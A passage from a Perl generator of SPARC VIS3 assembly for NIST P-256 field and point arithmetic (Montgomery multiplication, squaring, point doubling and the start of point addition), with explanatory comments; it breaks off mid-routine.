my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5)=map("%o$_",(0..5));
my ($bi,$poly1,$poly3,$minus1)=(map("%i$_",(3..5)),"%g1");
my ($rp_real,$ap_real)=("%g2","%g3");
my ($acc6,$acc7)=($bp,$bi); # used in squaring
$code.=<<___;
.align 32
__ecp_nistz256_mul_by_2_vis3:
addcc $acc0,$acc0,$acc0
addxccc $acc1,$acc1,$acc1
addxccc $acc2,$acc2,$acc2
addxccc $acc3,$acc3,$acc3
b .Lreduce_by_sub_vis3
addxc %g0,%g0,$acc4 ! did it carry?
.size __ecp_nistz256_mul_by_2_vis3,.-__ecp_nistz256_mul_by_2_vis3
.align 32
__ecp_nistz256_add_vis3:
ldx [$bp+0],$t0
ldx [$bp+8],$t1
ldx [$bp+16],$t2
ldx [$bp+24],$t3
__ecp_nistz256_add_noload_vis3:
addcc $t0,$acc0,$acc0
addxccc $t1,$acc1,$acc1
addxccc $t2,$acc2,$acc2
addxccc $t3,$acc3,$acc3
addxc %g0,%g0,$acc4 ! did it carry?
.Lreduce_by_sub_vis3:
addcc $acc0,1,$t0 ! add -modulus, i.e. subtract
addxccc $acc1,$poly1,$t1
addxccc $acc2,$minus1,$t2
addxc $acc3,$poly3,$t3
movrnz $acc4,$t0,$acc0 ! if a+b carried, ret = ret-mod
movrnz $acc4,$t1,$acc1
stx $acc0,[$rp]
movrnz $acc4,$t2,$acc2
stx $acc1,[$rp+8]
movrnz $acc4,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_add_vis3,.-__ecp_nistz256_add_vis3
! Trouble with subtraction is that there is no subtraction with 64-bit
! borrow, only with 32-bit one. For this reason we "decompose" 64-bit
! $acc0-$acc3 to 32-bit values and pick b[4] in 32-bit pieces. But
! recall that SPARC is big-endian, which is why you'll observe that
! b[4] is accessed as 4-0-12-8-20-16-28-24. And prior reduction we
! "collect" result back to 64-bit $acc0-$acc3.
.align 32
__ecp_nistz256_sub_from_vis3:
ld [$bp+4],$t0
ld [$bp+0],$t1
ld [$bp+12],$t2
ld [$bp+8],$t3
srlx $acc0,32,$acc4
not $poly1,$poly1
srlx $acc1,32,$acc5
subcc $acc0,$t0,$acc0
ld [$bp+20],$t0
subccc $acc4,$t1,$acc4
ld [$bp+16],$t1
subccc $acc1,$t2,$acc1
ld [$bp+28],$t2
and $acc0,$poly1,$acc0
subccc $acc5,$t3,$acc5
ld [$bp+24],$t3
sllx $acc4,32,$acc4
and $acc1,$poly1,$acc1
sllx $acc5,32,$acc5
or $acc0,$acc4,$acc0
srlx $acc2,32,$acc4
or $acc1,$acc5,$acc1
srlx $acc3,32,$acc5
subccc $acc2,$t0,$acc2
subccc $acc4,$t1,$acc4
subccc $acc3,$t2,$acc3
and $acc2,$poly1,$acc2
subccc $acc5,$t3,$acc5
sllx $acc4,32,$acc4
and $acc3,$poly1,$acc3
sllx $acc5,32,$acc5
or $acc2,$acc4,$acc2
subc %g0,%g0,$acc4 ! did it borrow?
b .Lreduce_by_add_vis3
or $acc3,$acc5,$acc3
.size __ecp_nistz256_sub_from_vis3,.-__ecp_nistz256_sub_from_vis3
.align 32
__ecp_nistz256_sub_morf_vis3:
ld [$bp+4],$t0
ld [$bp+0],$t1
ld [$bp+12],$t2
ld [$bp+8],$t3
srlx $acc0,32,$acc4
not $poly1,$poly1
srlx $acc1,32,$acc5
subcc $t0,$acc0,$acc0
ld [$bp+20],$t0
subccc $t1,$acc4,$acc4
ld [$bp+16],$t1
subccc $t2,$acc1,$acc1
ld [$bp+28],$t2
and $acc0,$poly1,$acc0
subccc $t3,$acc5,$acc5
ld [$bp+24],$t3
sllx $acc4,32,$acc4
and $acc1,$poly1,$acc1
sllx $acc5,32,$acc5
or $acc0,$acc4,$acc0
srlx $acc2,32,$acc4
or $acc1,$acc5,$acc1
srlx $acc3,32,$acc5
subccc $t0,$acc2,$acc2
subccc $t1,$acc4,$acc4
subccc $t2,$acc3,$acc3
and $acc2,$poly1,$acc2
subccc $t3,$acc5,$acc5
sllx $acc4,32,$acc4
and $acc3,$poly1,$acc3
sllx $acc5,32,$acc5
or $acc2,$acc4,$acc2
subc %g0,%g0,$acc4 ! did it borrow?
or $acc3,$acc5,$acc3
.Lreduce_by_add_vis3:
addcc $acc0,-1,$t0 ! add modulus
not $poly3,$t3
addxccc $acc1,$poly1,$t1
not $poly1,$poly1 ! restore $poly1
addxccc $acc2,%g0,$t2
addxc $acc3,$t3,$t3
movrnz $acc4,$t0,$acc0 ! if a-b borrowed, ret = ret+mod
movrnz $acc4,$t1,$acc1
stx $acc0,[$rp]
movrnz $acc4,$t2,$acc2
stx $acc1,[$rp+8]
movrnz $acc4,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_sub_morf_vis3,.-__ecp_nistz256_sub_morf_vis3
.align 32
__ecp_nistz256_div_by_2_vis3:
! ret = (a is odd ? a+mod : a) >> 1
not $poly1,$t1
not $poly3,$t3
and $acc0,1,$acc5
addcc $acc0,-1,$t0 ! add modulus
addxccc $acc1,$t1,$t1
addxccc $acc2,%g0,$t2
addxccc $acc3,$t3,$t3
addxc %g0,%g0,$acc4 ! carry bit
movrnz $acc5,$t0,$acc0
movrnz $acc5,$t1,$acc1
movrnz $acc5,$t2,$acc2
movrnz $acc5,$t3,$acc3
movrz $acc5,%g0,$acc4
! ret >>= 1
srlx $acc0,1,$acc0
sllx $acc1,63,$t0
srlx $acc1,1,$acc1
or $acc0,$t0,$acc0
sllx $acc2,63,$t1
srlx $acc2,1,$acc2
or $acc1,$t1,$acc1
sllx $acc3,63,$t2
stx $acc0,[$rp]
srlx $acc3,1,$acc3
or $acc2,$t2,$acc2
sllx $acc4,63,$t3 ! don't forget carry bit
stx $acc1,[$rp+8]
or $acc3,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_div_by_2_vis3,.-__ecp_nistz256_div_by_2_vis3
! compared to __ecp_nistz256_mul_mont it's almost 4x smaller and
! 4x faster [on T4]...
.align 32
__ecp_nistz256_mul_mont_vis3:
mulx $a0,$bi,$acc0
not $poly3,$poly3 ! 0xFFFFFFFF00000001
umulxhi $a0,$bi,$t0
mulx $a1,$bi,$acc1
umulxhi $a1,$bi,$t1
mulx $a2,$bi,$acc2
umulxhi $a2,$bi,$t2
mulx $a3,$bi,$acc3
umulxhi $a3,$bi,$t3
ldx [$bp+8],$bi ! b[1]
addcc $acc1,$t0,$acc1 ! accumulate high parts of multiplication
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc2
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc3
addxc %g0,$t3,$acc4
mov 0,$acc5
___
for($i=1;$i<4;$i++) {
# Reduction iteration is normally performed by accumulating
# result of multiplication of modulus by "magic" digit [and
# omitting least significant word, which is guaranteed to
# be 0], but thanks to special form of modulus and "magic"
# digit being equal to least significant word, it can be
# performed with additions and subtractions alone. Indeed:
#
# ffff0001.00000000.0000ffff.ffffffff
# * abcdefgh
# + xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.abcdefgh
#
# Now observing that ff..ff*x = (2^n-1)*x = 2^n*x-x, we
# rewrite above as:
#
# xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.abcdefgh
# + abcdefgh.abcdefgh.0000abcd.efgh0000.00000000
# - 0000abcd.efgh0000.00000000.00000000.abcdefgh
#
# or marking redundant operations:
#
# xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.--------
# + abcdefgh.abcdefgh.0000abcd.efgh0000.--------
# - 0000abcd.efgh0000.--------.--------.--------
# ^^^^^^^^ but this word is calculated with umulxhi, because
# there is no subtract with 64-bit borrow:-(
$code.=<<___;
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
mulx $a0,$bi,$t0
addxccc $acc2,$t1,$acc1
mulx $a1,$bi,$t1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
mulx $a2,$bi,$t2
addxccc $acc4,$t3,$acc3
mulx $a3,$bi,$t3
addxc $acc5,%g0,$acc4
addcc $acc0,$t0,$acc0 ! accumulate low parts of multiplication
umulxhi $a0,$bi,$t0
addxccc $acc1,$t1,$acc1
umulxhi $a1,$bi,$t1
addxccc $acc2,$t2,$acc2
umulxhi $a2,$bi,$t2
addxccc $acc3,$t3,$acc3
umulxhi $a3,$bi,$t3
addxc $acc4,%g0,$acc4
___
$code.=<<___ if ($i<3);
ldx [$bp+8*($i+1)],$bi ! bp[$i+1]
___
$code.=<<___;
addcc $acc1,$t0,$acc1 ! accumulate high parts of multiplication
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc2
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc3
addxccc $acc4,$t3,$acc4
addxc %g0,%g0,$acc5
___
}
$code.=<<___;
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
addxccc $acc2,$t1,$acc1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
addxccc $acc4,$t3,$acc3
b .Lmul_final_vis3 ! see below
addxc $acc5,%g0,$acc4
.size __ecp_nistz256_mul_mont_vis3,.-__ecp_nistz256_mul_mont_vis3
! compared to above __ecp_nistz256_mul_mont_vis3 it's 21% less
! instructions, but only 14% faster [on T4]...
.align 32
__ecp_nistz256_sqr_mont_vis3:
! | | | | | |a1*a0| |
! | | | | |a2*a0| | |
! | |a3*a2|a3*a0| | | |
! | | | |a2*a1| | | |
! | | |a3*a1| | | | |
! *| | | | | | | | 2|
! +|a3*a3|a2*a2|a1*a1|a0*a0|
! |--+--+--+--+--+--+--+--|
! |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax is $accx, i.e. follow $accx
!
! "can't overflow" below mark carrying into high part of
! multiplication result, which can't overflow, because it
! can never be all ones.
mulx $a1,$a0,$acc1 ! a[1]*a[0]
umulxhi $a1,$a0,$t1
mulx $a2,$a0,$acc2 ! a[2]*a[0]
umulxhi $a2,$a0,$t2
mulx $a3,$a0,$acc3 ! a[3]*a[0]
umulxhi $a3,$a0,$acc4
addcc $acc2,$t1,$acc2 ! accumulate high parts of multiplication
mulx $a2,$a1,$t0 ! a[2]*a[1]
umulxhi $a2,$a1,$t1
addxccc $acc3,$t2,$acc3
mulx $a3,$a1,$t2 ! a[3]*a[1]
umulxhi $a3,$a1,$t3
addxc $acc4,%g0,$acc4 ! can't overflow
mulx $a3,$a2,$acc5 ! a[3]*a[2]
not $poly3,$poly3 ! 0xFFFFFFFF00000001
umulxhi $a3,$a2,$acc6
addcc $t2,$t1,$t1 ! accumulate high parts of multiplication
mulx $a0,$a0,$acc0 ! a[0]*a[0]
addxc $t3,%g0,$t2 ! can't overflow
addcc $acc3,$t0,$acc3 ! accumulate low parts of multiplication
umulxhi $a0,$a0,$a0
addxccc $acc4,$t1,$acc4
mulx $a1,$a1,$t1 ! a[1]*a[1]
addxccc $acc5,$t2,$acc5
umulxhi $a1,$a1,$a1
addxc $acc6,%g0,$acc6 ! can't overflow
addcc $acc1,$acc1,$acc1 ! acc[1-6]*=2
mulx $a2,$a2,$t2 ! a[2]*a[2]
addxccc $acc2,$acc2,$acc2
umulxhi $a2,$a2,$a2
addxccc $acc3,$acc3,$acc3
mulx $a3,$a3,$t3 ! a[3]*a[3]
addxccc $acc4,$acc4,$acc4
umulxhi $a3,$a3,$a3
addxccc $acc5,$acc5,$acc5
addxccc $acc6,$acc6,$acc6
addxc %g0,%g0,$acc7
addcc $acc1,$a0,$acc1 ! +a[i]*a[i]
addxccc $acc2,$t1,$acc2
addxccc $acc3,$a1,$acc3
addxccc $acc4,$t2,$acc4
sllx $acc0,32,$t0
addxccc $acc5,$a2,$acc5
srlx $acc0,32,$t1
addxccc $acc6,$t3,$acc6
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
addxc $acc7,$a3,$acc7
___
for($i=0;$i<3;$i++) { # reductions, see commentary
# in multiplication for details
$code.=<<___;
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc1
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
addxc %g0,$t3,$acc3 ! cant't overflow
___
}
$code.=<<___;
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
addxccc $acc2,$t1,$acc1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
addxc %g0,$t3,$acc3 ! can't overflow
addcc $acc0,$acc4,$acc0 ! accumulate upper half
addxccc $acc1,$acc5,$acc1
addxccc $acc2,$acc6,$acc2
addxccc $acc3,$acc7,$acc3
addxc %g0,%g0,$acc4
.Lmul_final_vis3:
! Final step is "if result > mod, subtract mod", but as comparison
! means subtraction, we do the subtraction and then copy outcome
! if it didn't borrow. But note that as we [have to] replace
! subtraction with addition with negative, carry/borrow logic is
! inverse.
addcc $acc0,1,$t0 ! add -modulus, i.e. subtract
not $poly3,$poly3 ! restore 0x00000000FFFFFFFE
addxccc $acc1,$poly1,$t1
addxccc $acc2,$minus1,$t2
addxccc $acc3,$poly3,$t3
addxccc $acc4,$minus1,%g0 ! did it carry?
movcs %xcc,$t0,$acc0
movcs %xcc,$t1,$acc1
stx $acc0,[$rp]
movcs %xcc,$t2,$acc2
stx $acc1,[$rp+8]
movcs %xcc,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_sqr_mont_vis3,.-__ecp_nistz256_sqr_mont_vis3
___
########################################################################
# void ecp_nistz256_point_double(P256_POINT *out,const P256_POINT *inp);
#
{
my ($res_x,$res_y,$res_z,
$in_x,$in_y,$in_z,
$S,$M,$Zsqr,$tmp0)=map(32*$_,(0..9));
# above map() describes stack layout with 10 temporary
# 256-bit vectors on top.
$code.=<<___;
.align 32
ecp_nistz256_point_double_vis3:
save %sp,-STACK64_FRAME-32*10,%sp
mov $rp,$rp_real
.Ldouble_shortcut_vis3:
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$ap],$a0 ! in_x
ld [$ap+4],$t0
ld [$ap+8],$a1
ld [$ap+12],$t1
ld [$ap+16],$a2
ld [$ap+20],$t2
ld [$ap+24],$a3
ld [$ap+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap+32],$acc0 ! in_y
or $a0,$t0,$a0
ld [$ap+32+4],$t0
sllx $t2,32,$t2
ld [$ap+32+8],$acc1
or $a1,$t1,$a1
ld [$ap+32+12],$t1
sllx $t3,32,$t3
ld [$ap+32+16],$acc2
or $a2,$t2,$a2
ld [$ap+32+20],$t2
or $a3,$t3,$a3
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in_y+16]
stx $acc3,[%sp+LOCALS64+$in_y+24]
ld [$ap+64],$a0 ! in_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$a1
ld [$ap+64+12],$t1
ld [$ap+64+16],$a2
ld [$ap+64+20],$t2
ld [$ap+64+24],$a3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $a0,$t0,$a0
sllx $t2,32,$t2
or $a1,$t1,$a1
sllx $t3,32,$t3
or $a2,$t2,$a2
or $a3,$t3,$a3
sllx $t0,32,$t0
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in_z]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in_z+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in_z+16]
stx $a3,[%sp+LOCALS64+$in_z+24]
! in_y is still in $acc0-$acc3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(S, in_y);
add %sp,LOCALS64+$S,$rp
! in_z is still in $a0-$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Zsqr, in_z);
add %sp,LOCALS64+$Zsqr,$rp
mov $acc0,$a0 ! put Zsqr aside
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
add %sp,LOCALS64+$in_x,$bp
call __ecp_nistz256_add_vis3 ! p256_add(M, Zsqr, in_x);
add %sp,LOCALS64+$M,$rp
mov $a0,$acc0 ! restore Zsqr
ldx [%sp+LOCALS64+$S],$a0 ! forward load
mov $a1,$acc1
ldx [%sp+LOCALS64+$S+8],$a1
mov $a2,$acc2
ldx [%sp+LOCALS64+$S+16],$a2
mov $a3,$acc3
ldx [%sp+LOCALS64+$S+24],$a3
add %sp,LOCALS64+$in_x,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(Zsqr, in_x, Zsqr);
add %sp,LOCALS64+$Zsqr,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(S, S);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$in_z],$bi
ldx [%sp+LOCALS64+$in_y],$a0
ldx [%sp+LOCALS64+$in_y+8],$a1
ldx [%sp+LOCALS64+$in_y+16],$a2
ldx [%sp+LOCALS64+$in_y+24],$a3
add %sp,LOCALS64+$in_z,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(tmp0, in_z, in_y);
add %sp,LOCALS64+$tmp0,$rp
ldx [%sp+LOCALS64+$M],$bi ! forward load
ldx [%sp+LOCALS64+$Zsqr],$a0
ldx [%sp+LOCALS64+$Zsqr+8],$a1
ldx [%sp+LOCALS64+$Zsqr+16],$a2
ldx [%sp+LOCALS64+$Zsqr+24],$a3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(res_z, tmp0);
add %sp,LOCALS64+$res_z,$rp
add %sp,LOCALS64+$M,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(M, M, Zsqr);
add %sp,LOCALS64+$M,$rp
mov $acc0,$a0 ! put aside M
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
call __ecp_nistz256_mul_by_2_vis3
add %sp,LOCALS64+$M,$rp
mov $a0,$t0 ! copy M
ldx [%sp+LOCALS64+$S],$a0 ! forward load
mov $a1,$t1
ldx [%sp+LOCALS64+$S+8],$a1
mov $a2,$t2
ldx [%sp+LOCALS64+$S+16],$a2
mov $a3,$t3
ldx [%sp+LOCALS64+$S+24],$a3
call __ecp_nistz256_add_noload_vis3 ! p256_mul_by_3(M, M);
add %sp,LOCALS64+$M,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(tmp0, S);
add %sp,LOCALS64+$tmp0,$rp
ldx [%sp+LOCALS64+$S],$bi ! forward load
ldx [%sp+LOCALS64+$in_x],$a0
ldx [%sp+LOCALS64+$in_x+8],$a1
ldx [%sp+LOCALS64+$in_x+16],$a2
ldx [%sp+LOCALS64+$in_x+24],$a3
call __ecp_nistz256_div_by_2_vis3 ! p256_div_by_2(res_y, tmp0);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S, S, in_x);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$M],$a0 ! forward load
ldx [%sp+LOCALS64+$M+8],$a1
ldx [%sp+LOCALS64+$M+16],$a2
ldx [%sp+LOCALS64+$M+24],$a3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(tmp0, S);
add %sp,LOCALS64+$tmp0,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(res_x, M);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$tmp0,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, tmp0);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$M],$a0 ! forward load
ldx [%sp+LOCALS64+$M+8],$a1
ldx [%sp+LOCALS64+$M+16],$a2
ldx [%sp+LOCALS64+$M+24],$a3
add %sp,LOCALS64+$S,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(S, S, res_x);
add %sp,LOCALS64+$S,$rp
mov $acc0,$bi
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S, S, M);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$res_x],$a0 ! forward load
ldx [%sp+LOCALS64+$res_x+8],$a1
ldx [%sp+LOCALS64+$res_x+16],$a2
ldx [%sp+LOCALS64+$res_x+24],$a3
add %sp,LOCALS64+$res_y,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, S, res_y);
add %sp,LOCALS64+$res_y,$bp
! convert output to uint_32[8]
srlx $a0,32,$t0
srlx $a1,32,$t1
st $a0,[$rp_real] ! res_x
srlx $a2,32,$t2
st $t0,[$rp_real+4]
srlx $a3,32,$t3
st $a1,[$rp_real+8]
st $t1,[$rp_real+12]
st $a2,[$rp_real+16]
st $t2,[$rp_real+20]
st $a3,[$rp_real+24]
st $t3,[$rp_real+28]
ldx [%sp+LOCALS64+$res_z],$a0 ! forward load
srlx $acc0,32,$t0
ldx [%sp+LOCALS64+$res_z+8],$a1
srlx $acc1,32,$t1
ldx [%sp+LOCALS64+$res_z+16],$a2
srlx $acc2,32,$t2
ldx [%sp+LOCALS64+$res_z+24],$a3
srlx $acc3,32,$t3
st $acc0,[$rp_real+32] ! res_y
st $t0, [$rp_real+32+4]
st $acc1,[$rp_real+32+8]
st $t1, [$rp_real+32+12]
st $acc2,[$rp_real+32+16]
st $t2, [$rp_real+32+20]
st $acc3,[$rp_real+32+24]
st $t3, [$rp_real+32+28]
srlx $a0,32,$t0
srlx $a1,32,$t1
st $a0,[$rp_real+64] ! res_z
srlx $a2,32,$t2
st $t0,[$rp_real+64+4]
srlx $a3,32,$t3
st $a1,[$rp_real+64+8]
st $t1,[$rp_real+64+12]
st $a2,[$rp_real+64+16]
st $t2,[$rp_real+64+20]
st $a3,[$rp_real+64+24]
st $t3,[$rp_real+64+28]
ret
restore
.size ecp_nistz256_point_double_vis3,.-ecp_nistz256_point_double_vis3
___
}
########################################################################
# void ecp_nistz256_point_add(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT *in2);
{
my ($res_x,$res_y,$res_z,
$in1_x,$in1_y,$in1_z,
$in2_x,$in2_y,$in2_z,
$H,$Hsqr,$R,$Rsqr,$Hcub,
$U1,$U2,$S1,$S2)=map(32*$_,(0..17));
my ($Z1sqr, $Z2sqr) = ($Hsqr, $Rsqr);
# above map() describes stack layout with 18 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty and result of check for zero.
$code.=<<___;
.globl ecp_nistz256_point_add_vis3
.align 32
ecp_nistz256_point_add_vis3:
save %sp,-STACK64_FRAME-32*18-32,%sp
mov $rp,$rp_real
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$bp],$a0 ! in2_x
ld [$bp+4],$t0
ld [$bp+8],$a1
ld [$bp+12],$t1
ld [$bp+16],$a2
ld [$bp+20],$t2
ld [$bp+24],$a3
ld [$bp+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$bp+32],$acc0 ! in2_y
or $a0,$t0,$a0
ld [$bp+32+4],$t0
sllx $t2,32,$t2
ld [$bp+32+8],$acc1
or $a1,$t1,$a1
ld [$bp+32+12],$t1
sllx $t3,32,$t3
ld [$bp+32+16],$acc2
or $a2,$t2,$a2
ld [$bp+32+20],$t2
or $a3,$t3,$a3
ld [$bp+32+24],$acc3
sllx $t0,32,$t0
ld [$bp+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in2_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in2_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in2_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in2_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in2_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in2_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in2_y+16]
stx $acc3,[%sp+LOCALS64+$in2_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in2infty
stx $a0,[%fp+STACK_BIAS-8]
ld [$bp+64],$acc0 ! in2_z
ld [$bp+64+4],$t0
ld [$bp+64+8],$acc1
ld [$bp+64+12],$t1
ld [$bp+64+16],$acc2
ld [$bp+64+20],$t2
ld [$bp+64+24],$acc3
ld [$bp+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap],$a0 ! in1_x
or $acc0,$t0,$acc0
ld [$ap+4],$t0
sllx $t2,32,$t2
ld [$ap+8],$a1
or $acc1,$t1,$acc1
ld [$ap+12],$t1
sllx $t3,32,$t3
ld [$ap+16],$a2
or $acc2,$t2,$acc2
ld [$ap+20],$t2
or $acc3,$t3,$acc3
ld [$ap+24],$a3
sllx $t0,32,$t0
ld [$ap+28],$t3
sllx $t1,32,$t1
stx $acc0,[%sp+LOCALS64+$in2_z]
sllx $t2,32,$t2
stx $acc1,[%sp+LOCALS64+$in2_z+8]
sllx $t3,32,$t3
stx $acc2,[%sp+LOCALS64+$in2_z+16]
stx $acc3,[%sp+LOCALS64+$in2_z+24]
or $a0,$t0,$a0
ld [$ap+32],$acc0 ! in1_y
or $a1,$t1,$a1
ld [$ap+32+4],$t0
or $a2,$t2,$a2
ld [$ap+32+8],$acc1
or $a3,$t3,$a3
ld [$ap+32+12],$t1
ld [$ap+32+16],$acc2
ld [$ap+32+20],$t2
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in1_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in1_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in1_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in1_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in1_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_y+16]
stx $acc3,[%sp+LOCALS64+$in1_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in1infty
stx $a0,[%fp+STACK_BIAS-16]
ldx [%sp+LOCALS64+$in2_z],$a0 ! forward load
ldx [%sp+LOCALS64+$in2_z+8],$a1
ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
ld [$ap+64],$acc0 ! in1_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$acc1
ld [$ap+64+12],$t1
ld [$ap+64+16],$acc2
ld [$ap+64+20],$t2
ld [$ap+64+24],$acc3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $acc0,$t0,$acc0
sllx $t2,32,$t2
or $acc1,$t1,$acc1
sllx $t3,32,$t3
stx $acc0,[%sp+LOCALS64+$in1_z]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_z+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_z+16]
stx $acc3,[%sp+LOCALS64+$in1_z+24]
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z2sqr, in2_z);
add %sp,LOCALS64+$Z2sqr,$rp
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS64+$Z1sqr,$rp
ldx [%sp+LOCALS64+$Z2sqr],$bi
ldx [%sp+LOCALS64+$in2_z],$a0
ldx [%sp+LOCALS64+$in2_z+8],$a1
